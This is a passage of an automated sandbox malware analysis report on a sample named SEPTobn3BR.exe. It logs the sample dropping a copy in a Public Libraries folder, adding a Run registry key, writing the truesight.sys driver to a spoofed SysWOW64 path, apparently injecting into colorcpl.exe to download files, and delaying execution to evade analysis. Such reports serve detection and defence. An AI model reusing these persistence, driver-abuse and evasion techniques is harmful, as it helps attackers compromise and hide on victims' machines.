                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppwmi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: slc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppcext.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winscard.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: devobj.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: olepro32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: url.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieframe.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wkscli.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: netutils.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: amsi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wininet.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ieproxy.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: smartscreenps.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ???e???????????.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: ??l.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: tquery.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptdll.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: mssip32.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: endpointdlp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: advapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: spp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vssapi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: vsstrace.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppwmi.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: slc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppcext.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: winscard.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: devobj.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Users\Public\Libraries\Emxwenem.PIFSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: colorui.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: mscms.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: coloradapterclient.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: SEPTobn3BR.exeStatic file information: File size 1362944 > 1048576
                Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1519315775.0000000000842000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.0000000000816000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdb source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.00000000209F6000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F110000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: easinvoker.pdbGCTL source: SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B12000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.00000000209F6000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B41000.00000004.00000020.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F110000.00000004.00001000.00020000.00000000.sdmp, SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1518883152.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000003.1518883152.0000000000872000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 00000007.00000002.1542737572.0000000020A30000.00000004.00001000.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Emxwenem.PIF, 0000000B.00000003.1597805485.00000000007EE000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: Yara match -> File source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara match -> File source: 00000000.00000002.1421740936.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -> File source: 00000000.00000003.1334500441.000000007FB00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match -> File source: 00000000.00000002.1452056215.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B987A0 LoadLibraryW,GetProcAddress,FreeLibrary (0_2_02B987A0)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02BAC2FC push 02BAC367h; ret (0_2_02BAC35F)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B8635A push 02B863B7h; ret (0_2_02B863AF)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B8635C push 02B863B7h; ret (0_2_02B863AF)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02BAC0AC push 02BAC125h; ret (0_2_02BAC11D)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02BAC1F8 push 02BAC288h; ret (0_2_02BAC280)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02C36194 push eax; ret (0_2_02C361B2)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02C14162 push ecx; ret (0_2_02C14175)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02BAC144 push 02BAC1ECh; ret (0_2_02BAC1E4)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B986C0 push 02B98702h; ret (0_2_02B986FA)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B8673E push 02B86782h; ret (0_2_02B8677A)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B86740 push 02B86782h; ret (0_2_02B8677A)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B8C4F4 push ecx; mov dword ptr [esp], edx (0_2_02B8C4F9)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B9E5B4 push ecx; mov dword ptr [esp], edx (0_2_02B9E5B9)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B8CB74 push 02B8CCFAh; ret (0_2_02B8CCF2)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B8CB56 push 02B8CCFAh; ret (0_2_02B8CCF2)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B968D0 push 02B9697Bh; ret (0_2_02B96973)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B968CE push 02B9697Bh; ret (0_2_02B96973)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B9A920 push 02B9A958h; ret (0_2_02B9A950)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B98918 push 02B98950h; ret (0_2_02B98948)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B9A91F push 02B9A958h; ret (0_2_02B9A950)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B98916 push 02B98950h; ret (0_2_02B98948)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B92EE8 push 02B92F5Eh; ret (0_2_02B92F56)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B92FF3 push 02B93041h; ret (0_2_02B93039)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B92FF4 push 02B93041h; ret (0_2_02B93039)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B832FC push eax; ret (0_2_02B83338)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B8D528 push 02B8D554h; ret (0_2_02B8D54C)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02BABB6C push 02BABD94h; ret (0_2_02BABD8C)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B97894 push 02B97911h; ret (0_2_02B97909)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02C35872 push ecx; ret (0_2_02C35885)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B95E04 push ecx; mov dword ptr [esp], edx (0_2_02B95E06)
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Code function: 5_2_030E42E6 push ecx; ret (5_2_030E42F9)

                Persistence and Installation Behavior

                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> File created: C:\Users\Public\Libraries\Emxwenem.PIF
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> File created: C:\Windows \SysWOW64\truesight.sys
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> File created: C:\Windows \SysWOW64\truesight.sys
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> File created: C:\Windows \SysWOW64\truesight.sys
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Code function: 5_2_030963C6 ShellExecuteW,URLDownloadToFileW (5_2_030963C6)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> File created: C:\Users\Public\Libraries\Emxwenem.PIF
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Code function: 5_2_030A8A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle (5_2_030A8A00)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Emxwenem
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Emxwenem
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Code function: 0_2_02B9A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress (0_2_02B9A95C)
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe -> Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2C30000 memory commit 500006912
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2C31000 memory commit 500178944
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2C5C000 memory commit 500002816
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2C5D000 memory commit 500199424
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2C8E000 memory commit 501014528
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2D86000 memory commit 500006912
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2D88000 memory commit 500015104
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Memory allocated: 2B80000 memory commit 500006912
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Memory allocated: 2B81000 memory commit 500178944
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Memory allocated: 2BAC000 memory commit 500002816
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Memory allocated: 2BAD000 memory commit 500199424
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Memory allocated: 2BDE000 memory commit 501014528
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Memory allocated: 2CD6000 memory commit 500006912
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe -> Memory allocated: 2CD8000 memory commit 500015104
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2BF0000 memory commit 500006912
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2BF1000 memory commit 500178944
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2C1C000 memory commit 500002816
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2C1D000 memory commit 500199424
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2C4E000 memory commit 501014528
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2D46000 memory commit 500006912
                Source: C:\Users\Public\Libraries\Emxwenem.PIF -> Memory allocated: 2D48000 memory commit 500015104
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Code function: 5_2_0309E18D Sleep,ExitProcess (5_2_0309E18D)
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Code function: 10_2_0299E18D Sleep,ExitProcess (10_2_0299E18D)
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle (5_2_030A86FE)
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle (10_2_029A86FE)
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Window / User API: threadDelayed 5127
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Window / User API: threadDelayed 4490
                Source: C:\Windows\SysWOW64\colorcpl.exe -> Window / User API: foregroundWindowGot 1753
                Source: C:\Windows\SysWOW64\colorcpl.exe -> API coverage: 4.8 %
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7944 -> Thread sleep count: 154 > 30
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7944 -> Thread sleep time: -77000s >= -30000s
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7948 -> Thread sleep count: 5127 > 30
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7948Thread sleep time: -15381000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7948Thread sleep count: 4490 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7948Thread sleep time: -13470000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SEPTobn3BR.exeCode function: 0_2_02B858B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B858B4
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,5_2_0309838E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0309B28E
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_030AA01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,5_2_030AA01B
